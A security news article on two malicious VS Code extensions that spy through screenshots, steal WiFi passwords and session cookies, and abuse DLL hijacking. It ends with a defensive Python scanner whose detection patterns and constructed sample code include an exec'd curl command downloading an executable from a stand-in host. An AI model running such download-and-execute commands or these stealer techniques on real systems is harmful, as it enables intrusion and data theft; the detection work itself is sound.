Malicious VS Code on Microsoft Registry Captures Your Screen and Steals Your WiFi Passwords

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer

Cybercriminals are increasingly weaponizing developer environments, as seen in a newly discovered malware campaign infiltrating the Visual Studio Code Marketplace.

Unlike typical extensions that simply harvest credentials or mine cryptocurrency, this sophisticated attack actively captures screenshots of a victim’s desktop, effectively spying on their code, private emails, and communication tools like Slack.

The malware is delivered through two seemingly legitimate extensions: “Bitcoin Black,” a dark theme, and “Codo AI,” a functioning coding assistant.

Both originate from the same publisher, “BigBlack,” and employ social engineering tactics to gain the trust of unsuspecting users before delivering their payload.

Bitcoin Black (Source – Koi)

Once installed, these extensions initiate a series of malicious activities that go far beyond standard data theft. They are designed to harvest clipboard contents, list running processes, and exfiltrate stored WiFi passwords from the infected machine.

The impact is severe, as the malware hijacks browser sessions by launching Chrome and Edge in headless mode, allowing attackers to steal session cookies and bypass authentication protections.

This level of intrusion turns a developer’s workstation into a fully compromised surveillance node, exposing not just the individual but their entire organization’s intellectual property and network access details.

Koi security analysts identified this threat after analyzing the behavioral patterns of the “Bitcoin Black” and “Codo AI” extensions.

Their research highlighted the attacker’s evolution from complex PowerShell scripts to more streamlined execution methods.

Delivery mechanism

By tracking the malware’s versions, the researchers observed that the threat actor simplified their delivery mechanism to improve reliability, shifting from password-protected ZIP files to direct downloads using native system tools such as curl.

This persistence and adaptability signal a determined adversary focused on refining their tradecraft for maximum efficiency.

Execution of the malicious script in extension.js (Source – Koi)

A key component of this attack is DLL hijacking, which is used to evade detection and establish persistence. The malware downloads a legitimate, signed executable of the popular screenshot tool known as “Lightshot” along with a malicious DLL file.

When the signed executable runs, it loads the attacker’s DLL in place of the genuine one, a technique that frequently slips past security controls that allow-list known, signed binaries.

The malicious code then creates a staging directory in the user’s AppData folder and signals its presence using a unique mutex named “COOL_SCREENSHOT_MUTEX_YARRR” to prevent multiple infections.

This clever disguise allows the infostealer to operate covertly while exfiltrating sensitive data to a command-and-control server.
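As an added, defender-side illustration (not code from the article or from Koi’s research), the script below walks the local VS Code extensions folder and flags the behaviours described above in extension JavaScript. The regex indicators, the publisher name check and the ~/.vscode/extensions layout are assumptions, and the sample extension.js text is constructed.

```python
"""Heuristic triage of installed VS Code extensions for the behaviours described above:
curl payload downloads, headless Chrome/Edge, a dropped Lightshot binary, the mutex name."""
import json
import os
import re

# (label, pattern) pairs checked against every .js file; heuristic, not Koi's published IoCs.
INDICATORS = [
    ("curl download of a payload", re.compile(r"\bcurl\b[^\n]{0,200}\.(exe|dll|zip)\b", re.I)),
    ("headless Chrome/Edge launch", re.compile(r"(chrome|msedge)[^\n]{0,200}--headless", re.I)),
    ("Lightshot binary reference", re.compile(r"lightshot", re.I)),
    ("known infostealer mutex name", re.compile(r"COOL_SCREENSHOT_MUTEX_YARRR")),
]
SUSPICIOUS_PUBLISHERS = {"bigblack"}  # publisher named in the article

def scan_source(js_text):
    """Return the labels of all indicators that match the given JavaScript text."""
    return [label for label, pat in INDICATORS if pat.search(js_text)]

def scan_extension_dir(ext_dir):
    """Scan one extension folder: flag the publisher and collect per-file indicator hits."""
    report = {"path": ext_dir, "publisher_flagged": False, "hits": {}}
    manifest = os.path.join(ext_dir, "package.json")
    if os.path.isfile(manifest):
        with open(manifest, encoding="utf-8", errors="replace") as fh:
            publisher = str(json.load(fh).get("publisher", "")).lower()
        report["publisher_flagged"] = publisher in SUSPICIOUS_PUBLISHERS
    for root, _dirs, files in os.walk(ext_dir):
        for name in (n for n in files if n.endswith(".js")):
            full = os.path.join(root, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                hits = scan_source(fh.read())
            if hits:
                report["hits"][os.path.relpath(full, ext_dir)] = hits
    return report

def scan_all(extensions_root=os.path.expanduser("~/.vscode/extensions")):
    """Scan every extension under the root; return only the reports with findings."""
    if not os.path.isdir(extensions_root):
        return []
    reports = [scan_extension_dir(os.path.join(extensions_root, d))
               for d in sorted(os.listdir(extensions_root))]
    return [r for r in reports if r["hits"] or r["publisher_flagged"]]

# Constructed sample mimicking the described extension.js behaviour (not real malware code)
SAMPLE_JS = (
    "const { exec } = require('child_process');\n"
    "exec('curl -o %APPDATA%\\\\stage\\\\Lightshot.exe https://example.invalid/ls.exe');\n"
    "exec('\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\" --headless');\n"
)
```

Running `scan_all()` on a workstation prints one report per extension that matches an indicator or the flagged publisher; any hit deserves manual review of the extension’s source rather than automatic action, since the patterns are coarse.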
